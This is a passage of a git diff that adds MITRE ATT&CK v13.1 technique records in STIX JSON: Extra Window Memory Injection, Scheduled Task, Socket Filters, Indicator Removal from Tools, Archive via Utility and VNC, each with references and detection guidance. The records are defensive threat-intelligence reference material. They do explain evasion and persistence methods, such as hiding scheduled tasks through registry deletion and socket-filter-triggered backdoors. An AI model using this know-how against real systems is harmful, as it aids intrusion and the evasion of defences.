"https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx", + "description": "Microsoft. (n.d.). SetWindowLong function. Retrieved December 16, 2017.", + "source_name": "Microsoft SetWindowLong function" + }, + { + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "source_name": "Elastic Process Injection July 2017" + }, + { + "url": "https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html", + "description": "MalwareTech. (2013, August 13). PowerLoader Injection \u2013 Something truly amazing. 
Retrieved December 16, 2017.", + "source_name": "MalwareTech Power Loader Aug 2013" + }, + { + "url": "https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/", + "description": "Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.", + "source_name": "WeLiveSecurity Gapz and Redyms Mar 2013" + }, + { + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx", + "description": "Microsoft. (n.d.). SendNotifyMessage function. Retrieved December 16, 2017.", + "source_name": "Microsoft SendNotifyMessage function" + } + ], + "modified": "2020-11-10T18:29:31.004Z", + "name": "Extra Window Memory Injection", + "description": "Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process. \n\nBefore creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)\n\nAlthough small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. 
Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process\u2019s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process\u2019s EWM.\n\nExecution granted through EWM injection may allow access to both the target process's memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as WriteProcessMemory and CreateRemoteThread.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Monitor for API calls related to enumerating and manipulating EWM such as GetWindowLong (Citation: Microsoft GetWindowLong function) and SetWindowLong (Citation: Microsoft SetWindowLong function). Malware associated with this technique have also used SendNotifyMessage (Citation: Microsoft SendNotifyMessage function) to trigger the associated window procedure and eventual malicious injection. 
(Citation: Elastic Process Injection July 2017)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Process: OS API Execution" + ], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Application control" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9.json new file mode 100644 index 0000000000000000000000000000000000000000..67d97e000d81be619d6ecd9ca6d3da731841667d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9.json 
@@ -0,0 +1,116 @@ +{ + "type": "bundle", + "id": "bundle--30d122bc-61e5-4d6d-870b-5246320f82e3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-07T17:11:17.807Z", + "name": "Scheduled Task", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. 
Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_contributors": [ + "Andrew Northern, @ex_raritas", + "Bryan Campbell, @bry_campbell", + "Zachary Abzug, @ZackDoesML", + "Selena Larson, @selenalarson", + "Sittikorn Sangrattanapitak" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. 
(Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. 
Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "File: File Modification", + "Scheduled Job: Scheduled Job Creation", + "Windows Registry: Windows Registry Key Creation", + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "id": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "created": "2019-11-27T14:58:00.429Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/005", + "external_id": "T1053.005" + }, + { + "source_name": "SigmaHQ", + "description": "BlackB0lt. (2022, April 15). https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml. Retrieved June 1, 2022.", + "url": "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" + }, + { + "source_name": "ProofPoint Serpent", + "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain" + }, + { + "source_name": "Defending Against Scheduled Task Attacks in Windows Environments", + "description": "Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. 
Retrieved July 5, 2022.", + "url": "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments" + }, + { + "source_name": "Twitter Leoloobeek Scheduled Task", + "description": "Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017.", + "url": "https://twitter.com/leoloobeek/status/939248813465853953" + }, + { + "source_name": "Tarrask scheduled task", + "description": "Microsoft Threat Intelligence Team & Detection and Response Team . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/" + }, + { + "source_name": "Microsoft Scheduled Task Events Win10", + "description": "Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events" + }, + { + "source_name": "TechNet Scheduled Task Events", + "description": "Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.", + "url": "https://technet.microsoft.com/library/dd315590.aspx" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + }, + { + "source_name": "TechNet Forum Scheduled Task Operational Setting", + "description": "Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. 
Retrieved December 12, 2017.", + "url": "https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520.json new file mode 100644 index 0000000000000000000000000000000000000000..3929ba5c96ede86155df1f6245a5df271d456d85 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520.json 
@@ -0,0 +1,83 @@ +{ + "type": "bundle", + "id": "bundle--155f36ca-dd8b-48ff-be96-579affabf812", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-20T19:56:18.579Z", + "name": "Socket Filters", + "description": "Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.\n\nTo establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020)\n\nFilters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. 
Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Identify running processes with raw sockets. Ensure processes listed have a need for an open raw socket and are in accordance with enterprise policy.(Citation: crowdstrike bpf socket filters)", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Tim (Wadhwa-)Brown", + "CrowdStrike" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Connection Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "created": "2022-09-30T21:18:41.930Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1205/002", + "external_id": "T1205.002" + }, + { + "source_name": "exatrack bpf filters passive backdoors", + "description": "ExaTrack. (2022, May 11). Tricephalic Hellkeeper: a tale of a passive backdoor. Retrieved October 18, 2022.", + "url": "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" + }, + { + "source_name": "crowdstrike bpf socket filters", + "description": "Jamie Harries. (2022, May 25). Hunting a Global Telecommunications Threat: DecisiveArchitect and Its Custom Implant JustForFun. 
Retrieved October 18, 2022.", + "url": "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/" + }, + { + "source_name": "Leonardo Turla Penquin May 2020", + "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA \u201cPenquin_x64\u201d. Retrieved March 11, 2021.", + "url": "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf" + }, + { + "source_name": "haking9 libpcap network sniffing", + "description": "Luis Martin Garcia. (2008, February 1). Hakin9 Issue 2/2008 Vol 3 No.2 VoIP Abuse: Storming SIP Security. Retrieved October 18, 2022.", + "url": "http://recursos.aldabaknocking.com/libpcapHakin9LuisMartinGarcia.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6.json new file mode 100644 index 0000000000000000000000000000000000000000..84ee9a94e428e52f89ec15fb53b5e507d475ebae --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--f278a551-bff2-46b3-864c-8017fd9154dc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--00d0b012-8a03-410e-95de-5826bf542de6", + "type": "attack-pattern", + "created": "2017-05-31T21:30:54.176Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1066", + "external_id": "T1066" + } + ], + "modified": "2020-03-20T15:22:53.835Z", + "name": "Indicator Removal from Tools", + "description": "If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may use [Software Packing](https://attack.mitre.org/techniques/T1045) or otherwise modify the file so it has a different signature, and then re-use the malware.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. 
The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_defense_bypassed": [ + "Log analysis", + "Host intrusion prevention systems", + "Anti-virus" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662.json new file mode 100644 index 0000000000000000000000000000000000000000..7aa869fd8f5d6b2df32bbff1de9ebc361bdda702 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662.json 
@@ -0,0 +1,81 @@ +{ + "type": "bundle", + "id": "bundle--ffe10296-7286-435d-baea-d8e0cb7a1325", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T19:28:21.394Z", + "name": "Archive via Utility", + "description": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.\n\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. \n\nOn Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) xcopy on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration. \n\nAdversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_contributors": [ + "Mayan Arora aka Mayan Mohan", + "Mark Wee" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. 
This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "File: File Creation", + "Process: Process Creation", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "created": "2020-02-20T21:01:25.428Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1560/001", + "external_id": "T1560.001" + }, + { + "source_name": "WinRAR Homepage", + "description": "A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.", + "url": "https://www.rarlab.com/" + }, + { + "source_name": "WinZip Homepage", + "description": "Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.", + "url": "https://www.winzip.com/win/en/" + }, + { + "source_name": "7zip Homepage", + "description": "I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.", + "url": "https://www.7-zip.org/" + }, + { + "source_name": "diantz.exe_lolbas", + "description": "Living Off The Land Binaries, Scripts and Libraries (LOLBAS). (n.d.). Diantz.exe. Retrieved October 25, 2021.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Diantz/" + }, + { + "source_name": "Wikipedia File Header Signatures", + "description": "Wikipedia. 
(2016, March 31). List of file signatures. Retrieved April 22, 2016.", + "url": "https://en.wikipedia.org/wiki/List_of_file_signatures" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b.json new file mode 100644 index 0000000000000000000000000000000000000000..4cd7a7e05ad2a4ee85f89211408f107a1945710d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b.json 
@@ -0,0 +1,113 @@ +{ + "type": "bundle", + "id": "bundle--e3722e26-5e9b-4903-b1c1-92ee0063b4e8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:46.879Z", + "name": "VNC", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (\u201cremote framebuffer\u201d) protocol to enable users to remotely control another computer\u2019s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_detection": "Use of VNC may be legitimate depending on the environment and how it\u2019s used. 
Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\n\nOn macOS systems log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Creation", + "Network Traffic: Network Connection Creation", + "Process: Process Creation" + ], + "x_mitre_system_requirements": [ + "VNC server installed and listening for connections." + ], + "type": "attack-pattern", + "id": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "created": "2020-02-11T18:28:44.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021/005", + "external_id": "T1021.005" + }, + { + "source_name": "The Remote Framebuffer Protocol", + "description": "T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.", + "url": "https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2" + }, + { + "source_name": "MacOS VNC software for Remote Desktop", + "description": "Apple Support. (n.d.). 
Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.", + "url": "https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac" + }, + { + "source_name": "VNC Authentication", + "description": "Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.", + "url": "https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication" + }, + { + "source_name": "Hijacking VNC", + "description": "Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.", + "url": "https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc" + }, + { + "source_name": "macOS root VNC login without authentication", + "description": "Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.", + "url": "https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication" + }, + { + "source_name": "VNC Vulnerabilities", + "description": "Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/" + }, + { + "source_name": "Offensive Security VNC Authentication Check", + "description": "Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.", + "url": "https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/" + }, + { + "source_name": "Attacking VNC Servers PentestLab", + "description": "Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.", + "url": "https://pentestlab.blog/2012/10/30/attacking-vnc-servers/" + }, + { + "source_name": "Havana authentication bug", + "description": "Jay Pipes. (2013, December 23). 
Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.", + "url": "http://lists.openstack.org/pipermail/openstack/2013-December/004138.html" + }, + { + "source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", + "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.", + "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins" + }, + { + "source_name": "Gnome Remote Desktop grd-settings", + "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", + "url": "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207" + }, + { + "source_name": "Gnome Remote Desktop gschema", + "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", + "url": "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055.json new file mode 100644 index 0000000000000000000000000000000000000000..f0a3459eb014606424641f6c7e492195e5c7cadc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055.json 
